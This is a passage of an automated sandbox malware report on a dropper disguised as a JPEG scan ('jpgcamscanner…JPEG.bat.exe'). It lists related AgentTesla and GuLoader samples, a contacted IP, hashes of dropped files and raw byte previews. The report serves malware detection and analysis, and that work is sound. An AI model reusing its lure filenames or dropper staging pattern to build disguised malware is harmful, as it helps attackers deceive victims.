            rTTSWIFT_8374783.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            FMC Order No22052468.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            Wire Transfer Payment Copy #18-05-2024.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            DA14680-01F08A92 24K.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            SKIIP 83EC125T1 22-0-05-24RQ.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 208.95.112.1
            Swift scan.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
            • 208.95.112.1
            gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
            • 208.95.112.1
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dllSHIPMT-97 6533 1936ROBUTECH.exeGet hashmaliciousGuLoaderBrowse
              SHIPMT-97 6533 1936ROBUTECH.exeGet hashmaliciousGuLoaderBrowse
                SHIPMT-97 6533 1936ROBUTECH.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  SHIPMT-97 6533 1936ROBUTECH.exeGet hashmaliciousGuLoaderBrowse
                    SecuriteInfo.com.Trojan.Siggen21.30206.14092.30541.exeGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Trojan.Siggen21.30206.14092.30541.exeGet hashmaliciousUnknownBrowse
                        TouchEn_nxKey_Installer_32bit.exeGet hashmaliciousUnknownBrowse
                          TouchEn_nxKey_Installer_32bit.exeGet hashmaliciousUnknownBrowse
                            TouchEn_nxKey_Installer_32bit.exeGet hashmaliciousUnknownBrowse
                              C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\BgImage.dlldUattdPClI.exeGet hashmaliciousGuLoaderBrowse
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):7680
                                Entropy (8bit):5.186992759580577
                                Encrypted:false
                                SSDEEP:96:8eS0AKTIfv7QCUsthvNL85s4lk38Eb3CDfvEh8uLzqk5nLiEQjJ3KxkP:t8BfjbUA/85q3wEh8uLmcLpmP
                                MD5:143C1B18CCD1AB2CEED02CAF0E06EF8A
                                SHA1:B59D780E0A85F816B41AA657D4A643D77BD20A99
                                SHA-256:8920AFAE5D9C06F6BA1F254A1E32AC2ACFB0FDB11AB2158CFE880A191045E3D7
                                SHA-512:91BD09610679224A7774044B16054721567385D3FAA241E72B51F27EF660870F7282E887016DF492D5B3AB3B6D9C130E036258C4F27D5CA4CC3A12B76FF71B39
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: dUattdPClI.exe, Detection: malicious, Browse
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L.....oZ...........!......................... ...............................P............@..........................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):11776
                                Entropy (8bit):5.832316471889005
                                Encrypted:false
                                SSDEEP:192:4PtkiQJr7jHYT87RfwXQ6YSYtOuVDi7IsFW14Ll8CO:H78TQIgGCDp14LGC
                                MD5:B0C77267F13B2F87C084FD86EF51CCFC
                                SHA1:F7543F9E9B4F04386DFBF33C38CBED1BF205AFB3
                                SHA-256:A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77
                                SHA-512:F2B57A2EEA00F52A3C7080F4B5F2BB85A7A9B9F16D12DA8F8FF673824556C62A0F742B72BE0FD82A2612A4B6DBD7E0FDC27065212DA703C2F7E28D199696F66E
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: SHIPMT-97 6533 1936ROBUTECH.exe, Detection: malicious, Browse
                                • Filename: SHIPMT-97 6533 1936ROBUTECH.exe, Detection: malicious, Browse
                                • Filename: SHIPMT-97 6533 1936ROBUTECH.exe, Detection: malicious, Browse
                                • Filename: SHIPMT-97 6533 1936ROBUTECH.exe, Detection: malicious, Browse
                                • Filename: SecuriteInfo.com.Trojan.Siggen21.30206.14092.30541.exe, Detection: malicious, Browse
                                • Filename: SecuriteInfo.com.Trojan.Siggen21.30206.14092.30541.exe, Detection: malicious, Browse
                                • Filename: TouchEn_nxKey_Installer_32bit.exe, Detection: malicious, Browse
                                • Filename: TouchEn_nxKey_Installer_32bit.exe, Detection: malicious, Browse
                                • Filename: TouchEn_nxKey_Installer_32bit.exe, Detection: malicious, Browse
                                Reputation:moderate, very likely benign file
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....oZ...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):9728
                                Entropy (8bit):5.0684006804573105
                                Encrypted:false
                                SSDEEP:96:oXHqZ4zC5RH3cXX1LlYlRowycxM2DjDf3GEst+Nt+jvDYx4AqndYHnxss:oXHq+CP3uKrpyREs06YxcdGn
                                MD5:EAC1C3707970FE7C71B2D760C34763FA
                                SHA1:F275E659AD7798994361F6CCB1481050ABA30FF8
                                SHA-256:062C75AD650548750564FFD7AEF8CD553773B5C26CAE7F25A5749B13165194E3
                                SHA-512:3415BD555CF47407C0AE62BE0DBCBA7173D2B33A371BF083CE908FC901811ADB888B7787D11EB9D99A1A739CBD9D1C66E565DB6CD678BDADAF753FBDA14FFD09
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:moderate, very likely benign file
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L.....oZ...........!......... ...............0............................................@..........................6..k....0.......`.......................p.......................................................0...............................text...Q........................... ..`.rdata..{....0......................@..@.data........@......................@....rsrc........`....... ..............@..@.reloc..l....p......."..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:Matlab v4 mat-file (little endian) \253, numeric, rows 33554432, columns 1572866
                                Category:dropped
                                Size (bytes):164013
                                Entropy (8bit):7.75758740590637
                                Encrypted:false
                                SSDEEP:3072:fyTCKnlTj+w9D/mJol3Al2PWQPec5TsLhAbdfh+Ye+/PN3bVuh2q:fiYw9rUolwl2uARhBfwYH/1C2q
                                MD5:36EDCCF96AF1480036761B7767424E1B
                                SHA1:1BD5D438646C81199CB2AA817CFB42A6E63AFFFA
                                SHA-256:0C6F40DA67227C6CA67F37AD0FF5B204B6011A5435D2ADB59DB33775BF6DC89A
                                SHA-512:52A7E1EE71C85303172FED4F7D06D7A4E9A88749813CF2C94BC6C4886939FF1ACA1BBD5F4AB340477867951D7D5E7CA2B684CC68315F67C7D56D1043FC972A35
                                Malicious:false
                                Reputation:low
                                Preview:........................vvv.......................LL.......1....rr....3.i....(....cc........5.W.<.I.R......t......t.G.6.ooooo...........|....ccc.....................;..uuuuu....... ..................777...P..................i.l.....J............nn........]...............---............;;.;.............................H....|||...]]]]..QQQQQ.I.IIIII..A...x.....?..L.====.........H..7..............,.....kk.......................tttt...........,,,.............hh.....#...L......x.B..................DDD.......b....S.X..fffffff.............................|.!!!.............FFF.Y..AA..........((((...........44........O.........`.........CC..........e....======.....N..o.....y.................................:............~~........R.{{{{{{......................<..............................s.U............____....999....c........................ccc..........X.ee.%%...........E..............................................G..x.!!!...pp.........u..T.............pp.9..................i.\\..........
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2066
                                Entropy (8bit):4.810407037549875
                                Encrypted:false
                                SSDEEP:48:MN9I1MAohVsLnzOOm2JN9GZb8XBkDLhCx1vmVhooQw7:MNqUVs76GJN9GZskDIx1kpt7
                                MD5:DA8899543EFCE0A7D85A682C55AC28A0
                                SHA1:5858844E1CD504DE8DCB57096AB853066CC0F4FF
                                SHA-256:3A3553C3DE7351416FD2C35B039E6ABFB5B5EA770B0F9679C8125BB4E8354815
                                SHA-512:B08AC2EE6DD769EEFE8934E744EDA3B890DC84C12508F1C8FF5A4AEBD890705A68C4E4775D9507E3FA63CD35E7118EC686B20A7E64B73A36FE31AA5905BDC675
                                Malicious:false
                                Preview:.9...........................#./HX......7............;....O....}......~.......y.........3...KC0....t......N.....9..)...J........}.......p...b.......).?...............6...f..................B..V../..~.....}........o...2.........P..&..-...........{..=t.....Y..7..........f.......@......u0.....M..........................J........*.............*..q........@CF.5.........(..9....................n........x}..q0.................%.m.....&...............M........hk...L.....3........>.......p.u.q&..?.$..D...K.......2...!.<.......Am.6........>..j...+...O.........e....$...............................[.........4...B....K..I...ES...........................M..........M..5....=...........`.......K.(..5........).............)#........H..u.............)'.b.........8M.....}.=.!. ...0..M.............G.....8......0.q..........JV...B..._......F..y............PS...................a............O....4.....1...H..y<..=.....d...p....x.......R...............Q....D............&.(..>.v.c.<........B....
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3803
                                Entropy (8bit):4.797992434642369
                                Encrypted:false
                                SSDEEP:96:vAhP/FY++Ow8uK/ChMRF487eAZFknjx6trqID4LCj6fZKlD+YbtN:vANFYh8Pa8779uFQqcJjD3
                                MD5:BD115698051CBA72973B3DB7CA9F334D
                                SHA1:FFA16DB0B0866EAE1A4ED3651CEECF9403C8A934
                                SHA-256:DA902025B32BC72A666904243CABBF238EF1E71C4CAEFE5D68359703819E670B
                                SHA-512:FD08ADB340F3D802CB58405BA7543FA68821750E019FD9B1EC8BA687F7EC2A2954499E405C2044CE91BCA2139F1E636E863994217596B02E9EBC8F6134402CDC
                                Malicious:false
                                Preview:S..#.W.;....|A*w..........y.k..c.D....#........./..........`......0.....4.........t.......................................X.........e...................,................o>...XX..I..~.D.|.........At....E.#..a.............................m..O.....................U.....#...~j.....^....|...R.....K..#.a.[...W..o.............\Y>p....w,.............,......%..:....+..~eZ....i>.4................?.......rs.Z#..........Z...g.......n8.......v ~...f.............".....w..mS..+.w..(...PI..`.q........... ................c...:w........|.....\.......J.....P......@.D......K......M....W......S....9.]T.....$..P. ..+..t...}~.......d...............................2....w...................H............?.......k.................D..q...3.%..... ..*.I6........0.......!.c....s..........`..W.>..........E......O..I.......k......"WL.....R..ztx....^3................T.........I.................)...U...q.....7......|...`...........................Y-.."....U...................6.4...F..M.}.2...........J.
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):2094
                                Entropy (8bit):4.910526940719618
                                Encrypted:false
                                SSDEEP:48:ykq7sZsXfjcVEfHrZLrlu/2O6+bpPIm91CGAn:ykq7sWvjiEfHrA2O6+lPImuGA
                                MD5:6D178C394E50EA2084B340781537AB0B
                                SHA1:8CF0D7A7F60ECACB2C70F51CBEC6B5665B80902E
                                SHA-256:2DF354893105AFF58C03983A228C91C9696973462FA7C4845AD8EE673E9DF0B1
                                SHA-512:35005C5AEB4B82E9D92CC87421692FEEB64AB5F9B1A4AD3F39CA9C24159D501BC85193FADB79D37CB9CA432B0D3BB47535D37AE8BDF9504867AB766FD0777483
                                Malicious:false
                                Preview:..W....|.%...".....S...).-$.x........w..........+..1']i..........D."......`..".f..'..........%..V..T........b.........8....F......h^.....8......'....w...Y?.............?....'...)....|.r...X..-._....w........+U.......|.............J.........y..g...i......[.+.....t...V......u........Q..^..6.|....h..v10.._+T......*.....L%..*......{.-y....../wp..1...d!..:w..K.......................$.....r(.........Y..........(................u....O..*.!Y.7....r......b......EP...................[.|5..w.........w.....a\..(......}s....f.n......-..x.........&.3.......t...........d..7..M..._...+...$...z~.v.....<......5......7.......V...?........u.................Rn..........(................../...*K..n..........x.p...........D..........................................Q..#....f.................-............/.....;.y.Y.K`.............T..H.4....f.7........K......d.......G.....N....Y...V[.;.........Dz....8.0........d.....y..D....T|.L...........n.!..h...,....#................,.....$...;.......z...S.w....
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1495
                                Entropy (8bit):4.786207058973599
                                Encrypted:false
                                SSDEEP:24:1IY23JmylAxXxU2kaUNqXxoKQ7L2YpczAkr5ldX+H6CWW3ffwBAZ+UWb1ZD:RCJjIu2DPsLRpczAk1lydvyAZ+vpp
                                MD5:F43C725B0E21DDD2A5A3D446C6ADEBE3
                                SHA1:5DB786BEF95C4F000FB8C960ADB17F52E111F437
                                SHA-256:7FC48C493CE04FE888B92A0F2C8CF0A562E58F9A0DA4AC25045ECB5102F236D9
                                SHA-512:3DB634BB4AB41611634A4A1E26FB05634337A9B98678D40F9EBB14FA18C676D694828D8458C8FF734B684AC364864266573957F727C1421F3FC92D6BB9DA2E85
                                Malicious:false
                                Preview:...g.....xS..&.........Z....6)...z.\..~.(.....4.... ...........|....e.o....uH......H.(......sj......i.d........x....E.k?.......~....................-...D5..q...5.......4...@.=...J.'..R.......V.Ic.4....p................2).F.........[...........g...@..................?..............x.o7.........e..R=.......4..$........H...k\r......}...wL...F.T..0..... *...Z...e....s......./.........?]...........sx...4..O.b....#...{..p..t?O..[}...1...............F............qX6........j...*.....s....W.......Y...R...n[........}..H.r....0....D.m.....Z.....X...*..o.Q...V......_..b....C.....................d...M.....0<....I.}B...I..._V......q...............f............p.l....W..Wtk..B.....O......f............n..W..^...b.N2.........+D.N..(......x....0g."XU...+.....z...j.d....a..._......)E..........^.................i.G.h.................][......j.*4.......".....Z.....7.......E..l.........k....{.............3A...D7......n.#...w.....$....*.i.....c........kQ.......:..............H.pG....-.......(
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1859
                                Entropy (8bit):4.805075590258339
                                Encrypted:false
                                SSDEEP:48:NxT3LlsAmysM0+OMKN7yJFH38nSWe6orh83faEuuy:NtblN3smOzofH3zWCh83ftu7
                                MD5:C5D99D8FFCE5F740EC0737F7C049EAA6
                                SHA1:74A7FC0DA11E1E5926EB0DB764DE970C13560665
                                SHA-256:44886489A819C10AD5E77992EE636FFAD2060A1F5C4189B15D9C7B3C1E9BDD24
                                SHA-512:D83D201F9CA9F1CB70CDAF3EBE4548009FF9C8DB0F71F075572EB3587CA1C7538F4DD9DC6CCD17177C9ED9C9F70832B363A97D207858D130C045B77C5E62F750
                                Malicious:false
                                Preview:.P/...+.[.......2....}U...l...\....[...S......9................M...!..........f..c.|.$.....a...#...N........2.."....KN....Ea..L.....!................../..(..T...-w...........QMWF.........g..I............k..w.N\..............i..,O:".m.............lNr.....>............M.....M.....vs.......A..../{...o....."..5.-.=:S.......O.`U.........i.\........%G...y........+.7..x"".....V........C....v...i..fm....3...K.P..^?.....vg.....M"K...................`J..,...)....n.Z6........r.........,k.......B{....S..W.........x4Q.qA.L........P.....".~.....>....Z............O.....`|^.................]d.e...$.p...J..=.....'..I.d...........K....{...}..~..........B..........j...e..t.0.@..z.........]...........~.Y...Y...r..p.......r_..o................'......k.....i.u.....gB...................]X..J.-..:...Z>.<.......K.q................m(}...Z.....E..... .Q.............y..x........c......_.....5.......6..iP,............:.p3........d.....|.O....~."......gO..........J.........c...........Z....V..|.....
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4356
                                Entropy (8bit):4.922796623834746
                                Encrypted:false
                                SSDEEP:96:Z1/SWPInqKKFFprwmLQjUn3kouc4PN+gUG+S5yF6oqV/v4h+x:Z1KcInqtxLQwn3kRnN+f3yolqVm+x
                                MD5:580AFDB7F940780A0E82DF3EBEB3F8F0
                                SHA1:4F32C82222EF7B9937AA35F7E82A758C5FE29EC1
                                SHA-256:759C6001A1A18F56EA122DE86368114000C48FB0A46B2187E8FBD1E846CC1AD1
                                SHA-512:6F201B231E84289259792EEA7CD3A69A6D2252A9A672FCB089BA9F44352AA4DC9150B0C5CB6B0B63925E731E535B2874A26C397C8EC07A9511F939B5E6989F0E
                                Malicious:false
                                Preview:.......U..>...............w.A.........)T.....v......X..............F.........;.F......t..x.h....l....b.....O.....+;X...Y.(Q....i........^3........3.\.......W........g"e.....CE..t.................}..9......%..B......b;.....Q..*..^....x......!........}......%...0..._.....r....|...W.(*..............2......s.....@\..............76....~........ ....(....@ X.{...@....v..w..c.....A......+D...........Y5.......o........T....|.3....+..[.E.*.y.}....U......p.E.....X.'B......C..k@..P..`..?<.O.k.......}...............o.....dl.....>..F/...2.......Fe..........1..........!..........Y....W.-......h.....z......Q..?..J.6.X..........3......UE.......3.c.......m....a..........x......Y.....\.........r.x..aG..........B1'..n....(...........Z.........j..........$...5.V..................].f..h..c....A5;_....:.b....H.d.........................6...5.....};..-..K.................................J........Q.z...:.p..........;..9.C4,../.....@...................x...p...W.t.p...e..U...x.........0........
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):349
                                Entropy (8bit):4.242626007880176
                                Encrypted:false
                                SSDEEP:6:4IvdzGAz6iKphlXA4xEQVuEtFQom0r3/8nRujRKvNqsjQsO4DjjFWBATA1OoRT8g:4IvjCAUEQVu+FvmqjYXU+DHFWBATAhQg
                                MD5:F69098FF568805BE8CF1B8B8EFA38119
                                SHA1:1FA8719408BFEAC133F70550A9BD5972042C5B9F
                                SHA-256:C9DD8F7ABCCA4612692F22ABF80E54CA814F9E5743CD877965E77192D42A1901
                                SHA-512:2DCD46E31F7D6D93BC6E65EE77DF2F8F374E7A020D62889F2F25347F7286C99CED4F473CFA65A35B7E19EC5308D0A5293BB91016A69B12EEE65BF4C6C4CBFC38
                                Malicious:false
                                Preview:atmolyzer lngdeskalaer befaringers laryngoplegia slideren,multimodalities eclosion phonokabler,cyklet retrievernes refunderingen consanguine,heteroptics loss vederstyggelighederne duplicere morton celotomies redvende tofu brndborermestres svinehund..tailoress lit cumber forstrkningsbjlkens scaliger semihumanistic.broderpartier trvlerdders parmese.
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3719
                                Entropy (8bit):4.907634267564538
                                Encrypted:false
                                SSDEEP:96:Ev+azFX4eoB/s1N6+pCJMY6G/zLmNPbykSp7A:qzB4eoBGpCJMY6uRp8
                                MD5:F91ED47ADC9A9DF27D912E158B8506EA
                                SHA1:19792128C34C254D6E1BDF521B60ACCBAD4222FF
                                SHA-256:7210161B773B11604540AD72BAA54A0CD9C530841EF8C6DE8FBE06EC7FBF2779
                                SHA-512:CC9B8C186F300DD4F9202419FC8FBD7DB452D35352590EC5EE49E9E54CF9032ABD1DA6D9502535A260004459BB57AEFD4C90607F8B93F65E5B33EF65A7FB467B
                                Malicious:false
                                Preview:...h.<...........W....i.,...... ......"0P?i..#...<....vE..p...............&=....c........}...tx...4..S.Du..V...n..........d..Z..K........*...d...._kb.U...v.]......Y...............X,..l...4....)...g.......^...:.................k.j.....F............f.:u..|.0\....-.#..\..........- n9+...s......."....!.`......I<.J............fv...v........1...(u............l......q...YZ....p..f.............m.......=....f.b.......$u.....Uy...>..[.3...gn....5............}...#.......6........8.W...........2.)+.d...q.............>...w.....?.....)z.L.....g...h...........;....._I..D..2r........Hw.{.......".vd..ds4............."............Y.......m.....................$....w............t..h........................F......D.*..}....2.........KJ..............N............\.E.....=......../;...Tgz.....................Z.7f....|.....pm4yQ...r..............%.......W.....W.."...]...........r...........g.......p....hV.E........./.O..........,.}.H..jTA......^..(..C.....V........$...................l..A......W..
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2533
                                Entropy (8bit):4.887150843352794
                                Encrypted:false
                                SSDEEP:48:RG2tOeauPi9UEMaHgblMaWvtwdkm9QtbzlI8c88+NTKqaAtYgf:TtOb0Xe0CtAkZtm8cT+cAtYK
                                MD5:477DAB1B6549DE2D9023D8F9CF05042B
                                SHA1:D96B04B86450B9546E06D12219BCB0C0437CC447
                                SHA-256:3A5BA38AF3DF1E8155785933C4924A145F6759915F37CFD07D5EDEE0D300227E
                                SHA-512:6D2BF1CC55829F058781A3586338D2A00F0C359FF68F3B0A4A72617A8F1D3BAD61CA274285F2FF6BEF887835694EDF28F00E6D4DB957BF65336B9DCC87E89F53
                                Malicious:false
                                Preview:.......o..4.x....1.5.....zl.....n......u..........r.3..I.&..=.2...h.........>.........].k..Hc)..E......\..W....@."...y?8..fz..r...s...R..V...$..Y.......y...........k....x.......[.............3..,....`..|..........06..3Q.......x..".......%W.H...Q.h..o.....D....[..(..,.............-br..............\.....x.........:...../....O....,...^.a...M|....7......S....p{..... ...7..h..P.d....h.i..I._.........J..z....!........`........a.............!W....+...K.....>..)..Y......g.......9}S.h...l.............jL@..........l........*.....F.G....l..t.....%......'................=.........'....[.....................sNH...Y.....AFe.........;...........l.;.Z......... .............."..............4.B...Z..J..7I.. .......G.h.....#i......V......s...B.........D..,.......".....5+...s4.1..................a.(.......o.g........m.....b.....{..X..P].5..........^....l...E.......z........Y..&....y.......=......~}...*....q5........1..1..d.........#.............5.R.=[9.f*...8..D.....(....I........`..,i9|..n......
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1837
                                Entropy (8bit):4.625230572661607
                                Encrypted:false
                                SSDEEP:24:RKCWhhnUAECpZibkd9ggk6PUgQOfUr7Y8acQQEZS6HH66Rf1T/pUlq9t5Yn98BJN:R4REC2JEPUgyLacEZZn6gWlPkJf8Y
                                MD5:12A53C34C5FA929682F2DB62752880B9
                                SHA1:6C60C458120AEE4603528266710B2AC66F3C24E1
                                SHA-256:B0F6C977CFE459FC79DE98FA6B606F43A1A22F3E1F02F8E369C98023E451739F
                                SHA-512:C86DC338DBDA83F7C1A180152190A083CD2F7BE4ED11794C2319EE34BC10E9A896F580E23E8A06B4A4903094F018C8C7FAF5264FEA1FDCFA24B11F0E8FEC4511
                                Malicious:false
                                Preview:..q...y.^........H.......3......$'~...............!....F...H.......}.....ot...E....N....V............M..........F....p./.....G.....q...$..t......S........#q7{.0....<.................TF..../...>O...H.._...x.............Z............!..t.........Yc+..z....:......|...<...L...!3............X...y.X..g....G...@N.............\2.`...............r.........."....G....w..z......!....~..'..........x....5.Y.*.&.F....l.NZ..........V...RV....9{.{.N..Ln..5...a...&..y.+...}...................3.U.......$......5.q.........W.....X..U..H]....=...N.T...............w.4.X................V.U...w.&....?.\.,....^....4..<b..8..........k............`...P........L.....K.....J....n...."....t.........8......$......."f......z.bl........................sa.........~...9......<............u......sO.....o.O..I.......6w..M.........}................|..I........@.rG........V...........sW.*............9....}./.'.G.....u......*.....S.e.N.......c.o..r...8........Y..Cs......C...............|.l............Q..u......
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3995
                                Entropy (8bit):4.955156372854779
                                Encrypted:false
                                SSDEEP:96:OXXDCP0Z3oaT1zMhGDW7YT1Bofjsko1Z1REBzF:On4h41zMQXT64rH1R6x
                                MD5:6A4165AA3EF3BB0B85129B53C8FC1C51
                                SHA1:6CCBCB4C740F34A7C3DCE4E406C3A2485BB690E2
                                SHA-256:1B84A4738FBCD4CA7D9A7FA44783094C780CBFAF6F323703487750B2BB38AAD4
                                SHA-512:83CA086A38D431E070B8E73F4E142B81C3DC419782DEFE15E95BFA345AEA05DCA3BE6CA2B6BB4ACF5E0A5E597D3AD6AA4D0007C0319E4A0A468A9A7FFA3D61D7
                                Malicious:false
                                Preview:.....N.jG..._.a............s...b............... K......Yg.0..............Y.,.X....Y........K.ZA..+.>..62..D.......bT............&........,....................A......A......................?............oc.............g..........-7......hsW........q...].(o\..Z.l.o..U.....y&............(......J....N.....'}.w....B......q...03...Y....b......6@..e..Z`..Q.\.\...f...................8.`..c......W..'w....u.Z.................b...dU.........YM....#.Q.k......8...........-...o.$.....]S.........S....J[........g......... .......K.......................-Y.".............O@..B^.....m.............I......JW..........u......w.8)............a0..x...V....6..}n[..z7...%..mI~....Y.....>.......b. ............N..........u.A...V..bi.........z...w.......$.Rx.\.................U........k.@.....i........*...L.........E....7I...........l............\...............x............p.............Q.'...v...5..o......c..A.FIN.}....:._.....E...$............?.\............R...Q0...........I......\:.......
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3638
                                Entropy (8bit):4.92982531475471
                                Encrypted:false
                                SSDEEP:96:Yid6n7dx8YHj9keiS2z1ZmZcBnT6u7z71eHpm6y:Vknxx8YHwDNdT6u7v1ecf
                                MD5:0CD5495C2AABC33E1CA835C7EC70AE67
                                SHA1:8AB470057A59DCA68ECD1821CA21C0E9C7083D6D
                                SHA-256:534322DAE0EADE3B303508F2E035CD74DA3D0FDB7948E518FCF48CAD2B39432B
                                SHA-512:C94721165B8B25B7BF68C91E4D7719BF30D91D3D02E91C0AD62EE5211BAC26C5D759FD730FBBD0AB894EFE55A36698D3A876F8F15670CBEC5F84F6D509E57BC6
                                Malicious:false
                                Preview:UR..........v*....b....k:+.^....D......P...........D.#........~...+..o.@....m.......;...........E...........W.2..."..*......w....G.. ..........H...6.......l.....U..................P.....0...V....7.Fn........>..1........f...e...........`..RP..=....'...a...3......p..d.tu.C.................M....@.E.........a.Y.......l..........%...._....-....=...n......-..:..,....N......................].m....Z......)........d............................!...............AH..@....._....|....VKv.d......%........'.....d..(......z...........E...............1..QU...........`........W......5............h..V...+.t.........;.h.......p....*.V......#.V.Bi..W.....Q......p...x....}.H..... ............p.i..I........]...b<.VW..u...W.$............HZ8............ .....(....o....................h............?....l.............n..........r.!L.............bD....u...............p@..@....w.........\..."rL.?.5.."D.............._..[{Y.........B...T....!.7..8R..y..B...J{.....Z......b.U.J.....C..pb..........q.......
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1536
                                Entropy (8bit):4.874765880930053
                                Encrypted:false
                                SSDEEP:24:8HvVZmdQB31xdZttWZlQW29eN+zliQkihQyzIWblLIpxymPDYWN/qO3fGle/E4lW:8V8dQTx+Q9gwAi2yzIsmYmP8TlelZ9u1
                                MD5:A9A4218B4FCC915F7DECE680632B49E7
                                SHA1:A9EA694A6E3B8DAB614079881104A48FEEE4B4B1
                                SHA-256:63D26C32CF8E3FFA695CEF2BAED6D5780F597169EE32100A90CE4E9881D66AA4
                                SHA-512:1E48C1DD6306AA614B06A4CFD2A29692771E73072A9EDDE69DB64A86260B6E8C7967EE8262469F3339B676001956F4ACA4DA5AE52A7D6ECF8F4DFA5BEB72AF8E
                                Malicious:false
                                Preview:......K.....2.>....!..E............8.......]^.....r.....1..........5.d..............5.9.H......8.....#.........D...........j.^B.....................|q^....|=.?....<....u..y..........T?..%...].. ........P..C.........$Y......"....m.......6.......@..1..........x.......n.......R.d..8.U...,...d...2.^...........!D.|.......}..........................].%...a3........LeJW;......?...A..r..P...U....@..^...~..J....I.........K....w1o....H.......3R.$......f...`....|......f........*.!..O.g"..........'......4............l.d.............G...`.......&..\......H..........................5...S.....q..E............r.c.Q...^.....R...........h.........a.>U2.=.........N....i.......s......... p!V.#.<....N?...@..................m}...j<..<..,.......$....4........]..)......w55..*.#...L.j..]"....{..0......%......8...l._O.lf.........{..............;>G.h.......r..W.........+..P.xX..O...V.(......].......................q...............%g..t.....r........D.....m........T.,.l.....x......,..............
                                Process:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2222
                                Entropy (8bit):4.914198609346288
                                Encrypted:false
                                SSDEEP:48:x9sBXkZPHGOxztfW2BRz4eTRXhfltDKM3gfwgcwbUoShcYSi52WX:x1ZPb5W2BRz46bVKMl0bUowSi52WX
                                MD5:20B88329E76E4AA925AD7D36061295AD
                                SHA1:0E5BFD4A2DFD6149CAAD7801C5318139CBB9BFD5
                                SHA-256:75F8686EFE42827DE0CFAF648D5B222400200DA3EF22C2DF00764CAB7F6E500E
